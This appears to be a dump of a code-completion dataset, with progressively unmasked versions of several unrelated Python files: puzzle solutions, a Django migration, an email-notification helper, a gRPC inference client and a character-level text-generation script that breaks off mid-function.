"step-4": "def part_1() ->int:\n start = 382345\n end = 843167\n total = 0\n for number in range(start, end + 1):\n if check_number(str(number)):\n total += 1\n return total\n\n\ndef check_number(problem_input: str) ->bool:\n previous = 0\n double = False\n for current in range(1, len(problem_input)):\n if int(problem_input[current]) < int(problem_input[previous]):\n return False\n if int(problem_input[previous]) == int(problem_input[current]):\n double = True\n previous += 1\n return double\n\n\ndef check_number_2(problem_input: str) ->bool:\n previous = 0\n current = 1\n triple = True\n seen_a_double = False\n length = len(problem_input)\n while current < length:\n if int(problem_input[current]) < int(problem_input[previous]):\n return False\n if int(problem_input[current]) == int(problem_input[previous]):\n if previous >= 1:\n triple = int(problem_input[previous - 1]) == int(problem_input\n [previous])\n if current < length - 1:\n triple = int(problem_input[current + 1]) == int(problem_input\n [current])\n while current < length - 1 and int(problem_input[current]\n ) == int(problem_input[current + 1]):\n current += 1\n previous += 1\n if not triple:\n seen_a_double = True\n previous += 1\n current += 1\n return seen_a_double\n\n\ndef part_2() ->int:\n start = 382345\n end = 843167\n total = 0\n for number in range(start, end + 1):\n if check_number_2(str(number)):\n total += 1\n return total\n\n\ndef main():\n x = '111111'\n print(check_number(x) is True)\n x = '223450'\n print(check_number(x) is False)\n x = '123789'\n print(check_number(x) is False)\n print('PART 1:', part_1())\n x = '112233'\n print(check_number_2(x) is True)\n x = '123444'\n print(check_number_2(x) is False)\n x = '111122'\n print(check_number_2(x) is True)\n x = '112222'\n print(check_number_2(x) is True)\n x = '1112589'\n print(check_number_2(x) is False)\n print('PART 2:', part_2())\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "def part_1() -> int:\n start = 382345\n end = 843167\n total = 0\n\n for number in range(start, end + 1):\n if check_number(str(number)):\n total += 1\n\n return total\n\n\ndef check_number(problem_input: str) -> bool:\n previous = 0\n double = False\n for current in range(1, len(problem_input)):\n if int(problem_input[current]) < int(problem_input[previous]):\n return False\n if int(problem_input[previous]) == int(problem_input[current]):\n double = True\n previous += 1\n\n return double\n\n\ndef check_number_2(problem_input: str) -> bool:\n previous = 0\n current = 1\n triple = True\n seen_a_double = False\n length = len(problem_input)\n while current < length:\n if int(problem_input[current]) < int(problem_input[previous]):\n return False\n if int(problem_input[current]) == int(problem_input[previous]):\n if previous >= 1:\n triple = int(problem_input[previous - 1]) == int(problem_input[previous])\n if current < length - 1:\n triple = int(problem_input[current + 1]) == int(problem_input[current])\n while current < length - 1 and int(problem_input[current]) == int(problem_input[current + 1]):\n current += 1\n previous += 1\n if not triple:\n seen_a_double = True\n\n previous += 1\n current += 1\n\n return seen_a_double\n\n\ndef part_2() -> int:\n start = 382345\n end = 843167\n total = 0\n\n for number in range(start, end + 1):\n if check_number_2(str(number)):\n total += 1\n\n return total\n\n\ndef main():\n x = \"111111\"\n print(check_number(x) is True)\n x = \"223450\"\n print(check_number(x) is False)\n x = \"123789\"\n print(check_number(x) is False)\n\n print(\"PART 1:\", part_1()) # should be 460\n\n x = \"112233\"\n print(check_number_2(x) is True)\n x = \"123444\"\n print(check_number_2(x) is False)\n x = \"111122\"\n print(check_number_2(x) is True)\n x = \"112222\"\n print(check_number_2(x) is True)\n x = \"1112589\"\n print(check_number_2(x) is False)\n\n print(\"PART 2:\", part_2())\n\n\nif __name__ == '__main__':\n main()\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
input_object = open("input.txt", "r")
input_data = input_object.readlines()
input_object.close()
cleaned_data = []
for line in input_data:
cleaned_data.append(int(line.strip()))
input_size = len(cleaned_data)
for i in range(0, input_size):
for j in range(i, input_size):
for k in range(j, input_size):
if cleaned_data[i] + cleaned_data[j] + cleaned_data[k] == 2020:
ans = cleaned_data[i]*cleaned_data[j]*cleaned_data[k]
print(ans)
break
|
normal
|
{
"blob_id": "72f3ae476581ff5acd6c7101764f4764285a47bd",
"index": 4426,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ninput_object.close()\n<mask token>\nfor line in input_data:\n cleaned_data.append(int(line.strip()))\n<mask token>\nfor i in range(0, input_size):\n for j in range(i, input_size):\n for k in range(j, input_size):\n if cleaned_data[i] + cleaned_data[j] + cleaned_data[k] == 2020:\n ans = cleaned_data[i] * cleaned_data[j] * cleaned_data[k]\n print(ans)\n break\n",
"step-3": "input_object = open('input.txt', 'r')\ninput_data = input_object.readlines()\ninput_object.close()\ncleaned_data = []\nfor line in input_data:\n cleaned_data.append(int(line.strip()))\ninput_size = len(cleaned_data)\nfor i in range(0, input_size):\n for j in range(i, input_size):\n for k in range(j, input_size):\n if cleaned_data[i] + cleaned_data[j] + cleaned_data[k] == 2020:\n ans = cleaned_data[i] * cleaned_data[j] * cleaned_data[k]\n print(ans)\n break\n",
"step-4": "input_object = open(\"input.txt\", \"r\")\ninput_data = input_object.readlines()\ninput_object.close()\ncleaned_data = []\n\nfor line in input_data:\n cleaned_data.append(int(line.strip()))\ninput_size = len(cleaned_data)\n\n\nfor i in range(0, input_size):\n for j in range(i, input_size):\n for k in range(j, input_size):\n if cleaned_data[i] + cleaned_data[j] + cleaned_data[k] == 2020:\n ans = cleaned_data[i]*cleaned_data[j]*cleaned_data[k]\n print(ans)\n break",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
'''
Seperate a number into several, maximize their product
'''
# recursive
def solution1(n):
if n <= 4:
return n
else:
return max(map(lambda x: solution1(x)*solution1(n-x), range(1, n//2 + 1)))
# dp
def solution2(n):
result_list = [1,2]
for i in range(3, n+1):
max_mult = max(list(map(lambda x: result_list[x] * (i-x-1), range(i-1))))
result_list.append(max_mult)
print(result_list, i)
return max_mult
if __name__ == '__main__':
result = solution1(8)
print(result)
result = solution2(8)
print(result)
|
normal
|
{
"blob_id": "76db5955b29696ca03ab22ef14ac018e0618e9e3",
"index": 2729,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef solution2(n):\n result_list = [1, 2]\n for i in range(3, n + 1):\n max_mult = max(list(map(lambda x: result_list[x] * (i - x - 1),\n range(i - 1))))\n result_list.append(max_mult)\n print(result_list, i)\n return max_mult\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef solution1(n):\n if n <= 4:\n return n\n else:\n return max(map(lambda x: solution1(x) * solution1(n - x), range(1, \n n // 2 + 1)))\n\n\ndef solution2(n):\n result_list = [1, 2]\n for i in range(3, n + 1):\n max_mult = max(list(map(lambda x: result_list[x] * (i - x - 1),\n range(i - 1))))\n result_list.append(max_mult)\n print(result_list, i)\n return max_mult\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef solution1(n):\n if n <= 4:\n return n\n else:\n return max(map(lambda x: solution1(x) * solution1(n - x), range(1, \n n // 2 + 1)))\n\n\ndef solution2(n):\n result_list = [1, 2]\n for i in range(3, n + 1):\n max_mult = max(list(map(lambda x: result_list[x] * (i - x - 1),\n range(i - 1))))\n result_list.append(max_mult)\n print(result_list, i)\n return max_mult\n\n\nif __name__ == '__main__':\n result = solution1(8)\n print(result)\n result = solution2(8)\n print(result)\n",
"step-5": "'''\nSeperate a number into several, maximize their product\n'''\n\n# recursive\ndef solution1(n):\n if n <= 4:\n return n\n else:\n return max(map(lambda x: solution1(x)*solution1(n-x), range(1, n//2 + 1)))\n\n# dp\ndef solution2(n):\n result_list = [1,2]\n\n for i in range(3, n+1):\n max_mult = max(list(map(lambda x: result_list[x] * (i-x-1), range(i-1))))\n result_list.append(max_mult)\n print(result_list, i)\n\n return max_mult\n\nif __name__ == '__main__':\n result = solution1(8)\n print(result)\n result = solution2(8)\n print(result)",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
dependencies = [('myems', '0004_auto_20201118_1446')]
operations = [migrations.RenameField(model_name='dg', old_name='sn',
new_name='id'), migrations.AddField(model_name='dg', name=
'code_ean13', field=models.CharField(default=0, max_length=50),
preserve_default=False), migrations.AddField(model_name='dg', name=
'commercial_designation_in_english', field=models.CharField(default
=0, max_length=100), preserve_default=False), migrations.
AlterModelTable(name='dg', table='dg_gen')]
<|reserved_special_token_1|>
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [('myems', '0004_auto_20201118_1446')]
operations = [migrations.RenameField(model_name='dg', old_name='sn',
new_name='id'), migrations.AddField(model_name='dg', name=
'code_ean13', field=models.CharField(default=0, max_length=50),
preserve_default=False), migrations.AddField(model_name='dg', name=
'commercial_designation_in_english', field=models.CharField(default
=0, max_length=100), preserve_default=False), migrations.
AlterModelTable(name='dg', table='dg_gen')]
<|reserved_special_token_1|>
# Generated by Django 3.1.3 on 2020-11-19 06:19
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('myems', '0004_auto_20201118_1446'),
]
operations = [
migrations.RenameField(
model_name='dg',
old_name='sn',
new_name='id',
),
migrations.AddField(
model_name='dg',
name='code_ean13',
field=models.CharField(default=0, max_length=50),
preserve_default=False,
),
migrations.AddField(
model_name='dg',
name='commercial_designation_in_english',
field=models.CharField(default=0, max_length=100),
preserve_default=False,
),
migrations.AlterModelTable(
name='dg',
table='dg_gen',
),
]
|
flexible
|
{
"blob_id": "11d96a8a400afb0861b92d8900e003826614c99a",
"index": 7502,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('myems', '0004_auto_20201118_1446')]\n operations = [migrations.RenameField(model_name='dg', old_name='sn',\n new_name='id'), migrations.AddField(model_name='dg', name=\n 'code_ean13', field=models.CharField(default=0, max_length=50),\n preserve_default=False), migrations.AddField(model_name='dg', name=\n 'commercial_designation_in_english', field=models.CharField(default\n =0, max_length=100), preserve_default=False), migrations.\n AlterModelTable(name='dg', table='dg_gen')]\n",
"step-4": "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('myems', '0004_auto_20201118_1446')]\n operations = [migrations.RenameField(model_name='dg', old_name='sn',\n new_name='id'), migrations.AddField(model_name='dg', name=\n 'code_ean13', field=models.CharField(default=0, max_length=50),\n preserve_default=False), migrations.AddField(model_name='dg', name=\n 'commercial_designation_in_english', field=models.CharField(default\n =0, max_length=100), preserve_default=False), migrations.\n AlterModelTable(name='dg', table='dg_gen')]\n",
"step-5": "# Generated by Django 3.1.3 on 2020-11-19 06:19\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('myems', '0004_auto_20201118_1446'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='dg',\n old_name='sn',\n new_name='id',\n ),\n migrations.AddField(\n model_name='dg',\n name='code_ean13',\n field=models.CharField(default=0, max_length=50),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='dg',\n name='commercial_designation_in_english',\n field=models.CharField(default=0, max_length=100),\n preserve_default=False,\n ),\n migrations.AlterModelTable(\n name='dg',\n table='dg_gen',\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import grpc
import time
import json
import sys
import uuid
from arch.api.proto import inference_service_pb2
from arch.api.proto import inference_service_pb2_grpc
import threading
def run(address):
ths = []
with grpc.insecure_channel(address) as channel:
for i in range(1):
th = threading.Thread(target=send, args=(channel,))
ths.append(th)
st = int(time.time())
for th in ths:
th.start()
for th in ths:
th.join()
et = int(time.time())
def process_response(call_future):
print(call_future.result())
def send(channel):
stub = inference_service_pb2_grpc.InferenceServiceStub(channel)
request = inference_service_pb2.InferenceMessage()
request_data = dict()
request_data['serviceId'] = 'xxxxxxxxx'
request_data['applyId'] = ''
# request_data['modelId'] = 'arbiter-10000#guest-10000#host-10000#model' # You can specify the model id this way
# request_data['modelVersion'] = 'acd3e1807a1211e9969aacde48001122' # You can specify the model version this way
request_data['caseid'] = uuid.uuid1().hex
feature_data = dict()
feature_data['fid1'] = 5.1
feature_data['fid2'] = 6.2
feature_data['fid3'] = 7.6
request_data['featureData'] = feature_data
request_data['sendToRemoteFeatureData'] = feature_data
print(json.dumps(request_data, indent=4))
request.body = json.dumps(request_data).encode(encoding='utf-8')
print(stub.inference(request))
if __name__ == '__main__':
run(sys.argv[1])
|
normal
|
{
"blob_id": "5430e1861a6244c25c00699323efa0921a5af940",
"index": 3709,
"step-1": "<mask token>\n\n\ndef run(address):\n ths = []\n with grpc.insecure_channel(address) as channel:\n for i in range(1):\n th = threading.Thread(target=send, args=(channel,))\n ths.append(th)\n st = int(time.time())\n for th in ths:\n th.start()\n for th in ths:\n th.join()\n et = int(time.time())\n\n\n<mask token>\n\n\ndef send(channel):\n stub = inference_service_pb2_grpc.InferenceServiceStub(channel)\n request = inference_service_pb2.InferenceMessage()\n request_data = dict()\n request_data['serviceId'] = 'xxxxxxxxx'\n request_data['applyId'] = ''\n request_data['caseid'] = uuid.uuid1().hex\n feature_data = dict()\n feature_data['fid1'] = 5.1\n feature_data['fid2'] = 6.2\n feature_data['fid3'] = 7.6\n request_data['featureData'] = feature_data\n request_data['sendToRemoteFeatureData'] = feature_data\n print(json.dumps(request_data, indent=4))\n request.body = json.dumps(request_data).encode(encoding='utf-8')\n print(stub.inference(request))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef run(address):\n ths = []\n with grpc.insecure_channel(address) as channel:\n for i in range(1):\n th = threading.Thread(target=send, args=(channel,))\n ths.append(th)\n st = int(time.time())\n for th in ths:\n th.start()\n for th in ths:\n th.join()\n et = int(time.time())\n\n\ndef process_response(call_future):\n print(call_future.result())\n\n\ndef send(channel):\n stub = inference_service_pb2_grpc.InferenceServiceStub(channel)\n request = inference_service_pb2.InferenceMessage()\n request_data = dict()\n request_data['serviceId'] = 'xxxxxxxxx'\n request_data['applyId'] = ''\n request_data['caseid'] = uuid.uuid1().hex\n feature_data = dict()\n feature_data['fid1'] = 5.1\n feature_data['fid2'] = 6.2\n feature_data['fid3'] = 7.6\n request_data['featureData'] = feature_data\n request_data['sendToRemoteFeatureData'] = feature_data\n print(json.dumps(request_data, indent=4))\n request.body = json.dumps(request_data).encode(encoding='utf-8')\n print(stub.inference(request))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef run(address):\n ths = []\n with grpc.insecure_channel(address) as channel:\n for i in range(1):\n th = threading.Thread(target=send, args=(channel,))\n ths.append(th)\n st = int(time.time())\n for th in ths:\n th.start()\n for th in ths:\n th.join()\n et = int(time.time())\n\n\ndef process_response(call_future):\n print(call_future.result())\n\n\ndef send(channel):\n stub = inference_service_pb2_grpc.InferenceServiceStub(channel)\n request = inference_service_pb2.InferenceMessage()\n request_data = dict()\n request_data['serviceId'] = 'xxxxxxxxx'\n request_data['applyId'] = ''\n request_data['caseid'] = uuid.uuid1().hex\n feature_data = dict()\n feature_data['fid1'] = 5.1\n feature_data['fid2'] = 6.2\n feature_data['fid3'] = 7.6\n request_data['featureData'] = feature_data\n request_data['sendToRemoteFeatureData'] = feature_data\n print(json.dumps(request_data, indent=4))\n request.body = json.dumps(request_data).encode(encoding='utf-8')\n print(stub.inference(request))\n\n\nif __name__ == '__main__':\n run(sys.argv[1])\n",
"step-4": "import grpc\nimport time\nimport json\nimport sys\nimport uuid\nfrom arch.api.proto import inference_service_pb2\nfrom arch.api.proto import inference_service_pb2_grpc\nimport threading\n\n\ndef run(address):\n ths = []\n with grpc.insecure_channel(address) as channel:\n for i in range(1):\n th = threading.Thread(target=send, args=(channel,))\n ths.append(th)\n st = int(time.time())\n for th in ths:\n th.start()\n for th in ths:\n th.join()\n et = int(time.time())\n\n\ndef process_response(call_future):\n print(call_future.result())\n\n\ndef send(channel):\n stub = inference_service_pb2_grpc.InferenceServiceStub(channel)\n request = inference_service_pb2.InferenceMessage()\n request_data = dict()\n request_data['serviceId'] = 'xxxxxxxxx'\n request_data['applyId'] = ''\n request_data['caseid'] = uuid.uuid1().hex\n feature_data = dict()\n feature_data['fid1'] = 5.1\n feature_data['fid2'] = 6.2\n feature_data['fid3'] = 7.6\n request_data['featureData'] = feature_data\n request_data['sendToRemoteFeatureData'] = feature_data\n print(json.dumps(request_data, indent=4))\n request.body = json.dumps(request_data).encode(encoding='utf-8')\n print(stub.inference(request))\n\n\nif __name__ == '__main__':\n run(sys.argv[1])\n",
"step-5": "import grpc\nimport time\nimport json\nimport sys\nimport uuid\n\nfrom arch.api.proto import inference_service_pb2\nfrom arch.api.proto import inference_service_pb2_grpc\nimport threading\n\n\ndef run(address):\n ths = []\n with grpc.insecure_channel(address) as channel:\n for i in range(1):\n th = threading.Thread(target=send, args=(channel,))\n ths.append(th)\n st = int(time.time())\n for th in ths:\n th.start()\n for th in ths:\n th.join()\n et = int(time.time())\n\n\ndef process_response(call_future):\n print(call_future.result())\n\n\ndef send(channel):\n stub = inference_service_pb2_grpc.InferenceServiceStub(channel)\n request = inference_service_pb2.InferenceMessage()\n request_data = dict()\n request_data['serviceId'] = 'xxxxxxxxx'\n request_data['applyId'] = ''\n # request_data['modelId'] = 'arbiter-10000#guest-10000#host-10000#model' # You can specify the model id this way\n # request_data['modelVersion'] = 'acd3e1807a1211e9969aacde48001122' # You can specify the model version this way\n request_data['caseid'] = uuid.uuid1().hex\n\n feature_data = dict()\n feature_data['fid1'] = 5.1\n feature_data['fid2'] = 6.2\n feature_data['fid3'] = 7.6\n request_data['featureData'] = feature_data\n request_data['sendToRemoteFeatureData'] = feature_data\n\n print(json.dumps(request_data, indent=4))\n\n request.body = json.dumps(request_data).encode(encoding='utf-8')\n print(stub.inference(request))\n\n\nif __name__ == '__main__':\n run(sys.argv[1])\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
import hashlib
from django.conf import settings
from django.core import mail
from django.core.mail import EmailMultiAlternatives
from django.template.loader import render_to_string
from django.utils.crypto import get_random_string
def hexdigest_sha256(*args):
r = hashlib.sha256()
for arg in args:
r.update(str(arg).encode('utf-8'))
return r.hexdigest()
def get_reply_addr(message_id, dest):
if not hasattr(settings, 'REPLY_EMAIL'):
return []
addr = settings.REPLY_EMAIL
pos = addr.find('@')
name = addr[:pos]
domain = addr[pos:]
key = hexdigest_sha256(settings.SECRET_KEY, message_id, dest.pk)[0:12]
return ['%s+%s%s%s%s' % (name, dest.profile.email_token, message_id, key, domain)]
def generate_message_token():
return get_random_string(length=60, allowed_chars='abcdefghijklmnopqrstuvwxyz0123456789')
def notify_by_email(template, data, subject, sender, dests, message_id, ref=None):
if hasattr(settings, 'REPLY_EMAIL') and hasattr(settings, 'REPLY_KEY'):
data.update({'answering': True})
text_message = render_to_string('conversations/emails/%s.txt' % template, data)
html_message = render_to_string('conversations/emails/%s.html' % template, data)
from_email = '{name} <{email}>'.format(
name=sender.get_full_name() or sender.username,
email=settings.DEFAULT_FROM_EMAIL)
# Generating headers
headers = {'Message-ID': "<%s.%s>" % (message_id, settings.DEFAULT_FROM_EMAIL)}
if ref:
# This email reference a previous one
headers.update({
'References': '<%s.%s>' % (ref, settings.DEFAULT_FROM_EMAIL),
})
mails = []
for dest in dests:
if not dest.email:
continue
reply_to = get_reply_addr(message_id, dest)
mails += [(subject, (text_message, html_message), from_email, [dest.email], reply_to, headers)]
messages = []
for subject, message, from_email, dest_emails, reply_to, headers in mails:
text_message, html_message = message
msg = EmailMultiAlternatives(subject, text_message, from_email, dest_emails, reply_to=reply_to,
headers=headers)
msg.attach_alternative(html_message, 'text/html')
messages += [msg]
with mail.get_connection() as connection:
connection.send_messages(messages)
|
normal
|
{
"blob_id": "a35004e2b306ba1a8649ce66a1612f63a2b6bf39",
"index": 2673,
"step-1": "<mask token>\n\n\ndef hexdigest_sha256(*args):\n r = hashlib.sha256()\n for arg in args:\n r.update(str(arg).encode('utf-8'))\n return r.hexdigest()\n\n\n<mask token>\n\n\ndef notify_by_email(template, data, subject, sender, dests, message_id, ref\n =None):\n if hasattr(settings, 'REPLY_EMAIL') and hasattr(settings, 'REPLY_KEY'):\n data.update({'answering': True})\n text_message = render_to_string('conversations/emails/%s.txt' %\n template, data)\n html_message = render_to_string('conversations/emails/%s.html' %\n template, data)\n from_email = '{name} <{email}>'.format(name=sender.get_full_name() or\n sender.username, email=settings.DEFAULT_FROM_EMAIL)\n headers = {'Message-ID': '<%s.%s>' % (message_id, settings.\n DEFAULT_FROM_EMAIL)}\n if ref:\n headers.update({'References': '<%s.%s>' % (ref, settings.\n DEFAULT_FROM_EMAIL)})\n mails = []\n for dest in dests:\n if not dest.email:\n continue\n reply_to = get_reply_addr(message_id, dest)\n mails += [(subject, (text_message, html_message), from_email, [dest\n .email], reply_to, headers)]\n messages = []\n for subject, message, from_email, dest_emails, reply_to, headers in mails:\n text_message, html_message = message\n msg = EmailMultiAlternatives(subject, text_message, from_email,\n dest_emails, reply_to=reply_to, headers=headers)\n msg.attach_alternative(html_message, 'text/html')\n messages += [msg]\n with mail.get_connection() as connection:\n connection.send_messages(messages)\n",
"step-2": "<mask token>\n\n\ndef hexdigest_sha256(*args):\n r = hashlib.sha256()\n for arg in args:\n r.update(str(arg).encode('utf-8'))\n return r.hexdigest()\n\n\n<mask token>\n\n\ndef generate_message_token():\n return get_random_string(length=60, allowed_chars=\n 'abcdefghijklmnopqrstuvwxyz0123456789')\n\n\ndef notify_by_email(template, data, subject, sender, dests, message_id, ref\n =None):\n if hasattr(settings, 'REPLY_EMAIL') and hasattr(settings, 'REPLY_KEY'):\n data.update({'answering': True})\n text_message = render_to_string('conversations/emails/%s.txt' %\n template, data)\n html_message = render_to_string('conversations/emails/%s.html' %\n template, data)\n from_email = '{name} <{email}>'.format(name=sender.get_full_name() or\n sender.username, email=settings.DEFAULT_FROM_EMAIL)\n headers = {'Message-ID': '<%s.%s>' % (message_id, settings.\n DEFAULT_FROM_EMAIL)}\n if ref:\n headers.update({'References': '<%s.%s>' % (ref, settings.\n DEFAULT_FROM_EMAIL)})\n mails = []\n for dest in dests:\n if not dest.email:\n continue\n reply_to = get_reply_addr(message_id, dest)\n mails += [(subject, (text_message, html_message), from_email, [dest\n .email], reply_to, headers)]\n messages = []\n for subject, message, from_email, dest_emails, reply_to, headers in mails:\n text_message, html_message = message\n msg = EmailMultiAlternatives(subject, text_message, from_email,\n dest_emails, reply_to=reply_to, headers=headers)\n msg.attach_alternative(html_message, 'text/html')\n messages += [msg]\n with mail.get_connection() as connection:\n connection.send_messages(messages)\n",
"step-3": "<mask token>\n\n\ndef hexdigest_sha256(*args):\n r = hashlib.sha256()\n for arg in args:\n r.update(str(arg).encode('utf-8'))\n return r.hexdigest()\n\n\ndef get_reply_addr(message_id, dest):\n if not hasattr(settings, 'REPLY_EMAIL'):\n return []\n addr = settings.REPLY_EMAIL\n pos = addr.find('@')\n name = addr[:pos]\n domain = addr[pos:]\n key = hexdigest_sha256(settings.SECRET_KEY, message_id, dest.pk)[0:12]\n return ['%s+%s%s%s%s' % (name, dest.profile.email_token, message_id,\n key, domain)]\n\n\ndef generate_message_token():\n return get_random_string(length=60, allowed_chars=\n 'abcdefghijklmnopqrstuvwxyz0123456789')\n\n\ndef notify_by_email(template, data, subject, sender, dests, message_id, ref\n =None):\n if hasattr(settings, 'REPLY_EMAIL') and hasattr(settings, 'REPLY_KEY'):\n data.update({'answering': True})\n text_message = render_to_string('conversations/emails/%s.txt' %\n template, data)\n html_message = render_to_string('conversations/emails/%s.html' %\n template, data)\n from_email = '{name} <{email}>'.format(name=sender.get_full_name() or\n sender.username, email=settings.DEFAULT_FROM_EMAIL)\n headers = {'Message-ID': '<%s.%s>' % (message_id, settings.\n DEFAULT_FROM_EMAIL)}\n if ref:\n headers.update({'References': '<%s.%s>' % (ref, settings.\n DEFAULT_FROM_EMAIL)})\n mails = []\n for dest in dests:\n if not dest.email:\n continue\n reply_to = get_reply_addr(message_id, dest)\n mails += [(subject, (text_message, html_message), from_email, [dest\n .email], reply_to, headers)]\n messages = []\n for subject, message, from_email, dest_emails, reply_to, headers in mails:\n text_message, html_message = message\n msg = EmailMultiAlternatives(subject, text_message, from_email,\n dest_emails, reply_to=reply_to, headers=headers)\n msg.attach_alternative(html_message, 'text/html')\n messages += [msg]\n with mail.get_connection() as connection:\n connection.send_messages(messages)\n",
"step-4": "import hashlib\nfrom django.conf import settings\nfrom django.core import mail\nfrom django.core.mail import EmailMultiAlternatives\nfrom django.template.loader import render_to_string\nfrom django.utils.crypto import get_random_string\n\n\ndef hexdigest_sha256(*args):\n r = hashlib.sha256()\n for arg in args:\n r.update(str(arg).encode('utf-8'))\n return r.hexdigest()\n\n\ndef get_reply_addr(message_id, dest):\n if not hasattr(settings, 'REPLY_EMAIL'):\n return []\n addr = settings.REPLY_EMAIL\n pos = addr.find('@')\n name = addr[:pos]\n domain = addr[pos:]\n key = hexdigest_sha256(settings.SECRET_KEY, message_id, dest.pk)[0:12]\n return ['%s+%s%s%s%s' % (name, dest.profile.email_token, message_id,\n key, domain)]\n\n\ndef generate_message_token():\n return get_random_string(length=60, allowed_chars=\n 'abcdefghijklmnopqrstuvwxyz0123456789')\n\n\ndef notify_by_email(template, data, subject, sender, dests, message_id, ref\n =None):\n if hasattr(settings, 'REPLY_EMAIL') and hasattr(settings, 'REPLY_KEY'):\n data.update({'answering': True})\n text_message = render_to_string('conversations/emails/%s.txt' %\n template, data)\n html_message = render_to_string('conversations/emails/%s.html' %\n template, data)\n from_email = '{name} <{email}>'.format(name=sender.get_full_name() or\n sender.username, email=settings.DEFAULT_FROM_EMAIL)\n headers = {'Message-ID': '<%s.%s>' % (message_id, settings.\n DEFAULT_FROM_EMAIL)}\n if ref:\n headers.update({'References': '<%s.%s>' % (ref, settings.\n DEFAULT_FROM_EMAIL)})\n mails = []\n for dest in dests:\n if not dest.email:\n continue\n reply_to = get_reply_addr(message_id, dest)\n mails += [(subject, (text_message, html_message), from_email, [dest\n .email], reply_to, headers)]\n messages = []\n for subject, message, from_email, dest_emails, reply_to, headers in mails:\n text_message, html_message = message\n msg = EmailMultiAlternatives(subject, text_message, from_email,\n dest_emails, reply_to=reply_to, headers=headers)\n msg.attach_alternative(html_message, 'text/html')\n messages += [msg]\n with mail.get_connection() as connection:\n connection.send_messages(messages)\n",
"step-5": "import hashlib\n\nfrom django.conf import settings\nfrom django.core import mail\nfrom django.core.mail import EmailMultiAlternatives\nfrom django.template.loader import render_to_string\nfrom django.utils.crypto import get_random_string\n\n\ndef hexdigest_sha256(*args):\n\n r = hashlib.sha256()\n for arg in args:\n r.update(str(arg).encode('utf-8'))\n\n return r.hexdigest()\n\n\ndef get_reply_addr(message_id, dest):\n\n if not hasattr(settings, 'REPLY_EMAIL'):\n return []\n\n addr = settings.REPLY_EMAIL\n pos = addr.find('@')\n name = addr[:pos]\n domain = addr[pos:]\n key = hexdigest_sha256(settings.SECRET_KEY, message_id, dest.pk)[0:12]\n\n return ['%s+%s%s%s%s' % (name, dest.profile.email_token, message_id, key, domain)]\n\n\ndef generate_message_token():\n return get_random_string(length=60, allowed_chars='abcdefghijklmnopqrstuvwxyz0123456789')\n\n\ndef notify_by_email(template, data, subject, sender, dests, message_id, ref=None):\n\n if hasattr(settings, 'REPLY_EMAIL') and hasattr(settings, 'REPLY_KEY'):\n data.update({'answering': True})\n\n text_message = render_to_string('conversations/emails/%s.txt' % template, data)\n html_message = render_to_string('conversations/emails/%s.html' % template, data)\n\n from_email = '{name} <{email}>'.format(\n name=sender.get_full_name() or sender.username,\n email=settings.DEFAULT_FROM_EMAIL)\n\n # Generating headers\n headers = {'Message-ID': \"<%s.%s>\" % (message_id, settings.DEFAULT_FROM_EMAIL)}\n if ref:\n # This email reference a previous one\n headers.update({\n 'References': '<%s.%s>' % (ref, settings.DEFAULT_FROM_EMAIL),\n })\n\n mails = []\n for dest in dests:\n if not dest.email:\n continue\n\n reply_to = get_reply_addr(message_id, dest)\n\n mails += [(subject, (text_message, html_message), from_email, [dest.email], reply_to, headers)]\n\n messages = []\n for subject, message, from_email, dest_emails, reply_to, headers in mails:\n text_message, html_message = message\n msg = EmailMultiAlternatives(subject, text_message, from_email, dest_emails, reply_to=reply_to,\n headers=headers)\n msg.attach_alternative(html_message, 'text/html')\n messages += [msg]\n with mail.get_connection() as connection:\n connection.send_messages(messages)\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
def main():
print('Loading model...')
model, charset = load_model(MODEL_NAME)
print(charset)
seed_text = input('Enter a String: ').strip()
print()
generate_script(seed_text, model, charset)
def generate_script(seed_text, model, charset):
sys.stdout.write(seed_text)
sys.stdout.flush()
next_char = None
should_stop = False
while not should_stop:
prev_char = next_char
next_char = sample(model, seed_text, charset, temp=0.2)
sys.stdout.write(next_char)
sys.stdout.flush()
if prev_char == '\n' and prev_char == next_char:
should_stop = True
def sample(model, string, charset, temp=1.0):
inputs = [string_one_hot(string, charset)]
inputs = pad_sequences(inputs, padding='post', maxlen=64)
preds = model.predict(inputs)[0]
return charset[sample_preds(preds, temp)]
def sample_preds(results, temperature=1.0):
if temperature <= 0.0:
return np.argmax(results)
probs = np.exp(np.log(results) / temperature)
probs /= np.sum(probs)
return np.random.choice(len(results), p=probs)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def main():
print('Loading model...')
model, charset = load_model(MODEL_NAME)
print(charset)
seed_text = input('Enter a String: ').strip()
print()
generate_script(seed_text, model, charset)
def generate_script(seed_text, model, charset):
sys.stdout.write(seed_text)
sys.stdout.flush()
next_char = None
should_stop = False
while not should_stop:
